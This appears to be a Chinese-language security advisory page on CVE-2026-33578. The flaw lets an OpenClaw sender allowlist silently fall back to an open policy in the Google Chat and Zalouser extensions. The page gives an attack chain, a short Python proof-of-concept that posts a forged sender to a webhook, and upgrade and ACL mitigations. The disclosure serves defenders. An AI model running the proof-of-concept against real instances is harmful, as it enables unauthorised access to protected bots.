IPBUF安全漏洞报告
English
CVE-2026-33578 CVSS 4.3 中危

CVE-2026-33578 OpenClaw发送者策略绕过漏洞

披露日期: 2026-03-31

漏洞信息

漏洞编号
CVE-2026-33578
漏洞类型
权限绕过
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

权限绕过OpenClaw策略降级中危漏洞访问控制

漏洞概述

OpenClaw 2026.3.28之前版本在Google Chat和Zalouser扩展中存在发送者策略绕过漏洞。由于路由级组允许列表策略会静默降级为开放策略,攻击者可利用此策略解析缺陷绕过发送者限制,在配置了允许列表限制的情况下仍能与机器人进行交互,导致机密性信息泄露。

技术细节

该漏洞源于OpenClaw在集成Google Chat和Zalouser扩展处理路由级权限策略时存在严重的逻辑缺陷。在受影响的版本中,当管理员配置路由级组允许列表以限制特定发送者与机器人交互时,底层的策略解析引擎未能正确继承和应用这些限制。具体而言,代码逻辑将预期的严格“允许列表”策略错误地降级为“开放”策略,允许任何未经授权的发送者发起请求。这一过程是“静默”发生的,系统不会产生任何错误日志或告警,导致管理员难以察觉。攻击者利用这一策略解析错误,无需具备特殊权限,只需向受影响端点发送构造的HTTP请求即可绕过身份校验。由于系统对发送者身份的校验完全失效,攻击者可以与机器人进行未授权交互,获取本应受保护的敏感信息,严重破坏了系统的访问控制模型。

攻击链分析

STEP 1
侦察
攻击者识别出目标使用的是存在漏洞的OpenClaw版本(<2026.3.28),并确认其启用了Google Chat或Zalouser扩展。
STEP 2
策略分析
攻击者了解到目标配置了路由级组允许列表,理论上应拒绝非白名单用户的请求。
STEP 3
利用漏洞
攻击者向受影响的端点发送伪造的请求,模拟非白名单用户发送消息。
STEP 4
策略降级
由于漏洞存在,OpenClaw将严格的允许列表策略错误地降级为开放策略,未拦截攻击者的请求。
STEP 5
未授权交互
攻击者成功与机器人进行交互,获取敏感信息或执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Proof of Concept for CVE-2026-33578 # This script demonstrates bypassing the sender allowlist in vulnerable OpenClaw instances. TARGET_URL = "http://target-openclaw-instance/api/v1/chat/webhook" PAYLOAD = { "text": "Unauthorized message due to policy bypass", "sender": "[email protected]" } def exploit_policy_bypass(): print("[*] Attempting to bypass sender policy...") try: # The vulnerability allows requests from any sender despite route-level allowlists response = requests.post(TARGET_URL, json=PAYLOAD) if response.status_code == 200: print("[+] Successfully bypassed the policy! Message accepted.") print(f"[+] Response: {response.text}") else: print("[-] Request failed or blocked.") print(f"[-] Status Code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": exploit_policy_bypass()

影响范围

OpenClaw < 2026.3.28

防御指南

临时缓解措施
建议立即将OpenClaw升级到修复了此策略解析错误的最新版本。如果无法立即升级,应通过网络访问控制列表(ACL)限制对OpenClaw机器人端点的网络访问,仅允许受信任的IP地址连接,以缓解未经授权的访问风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表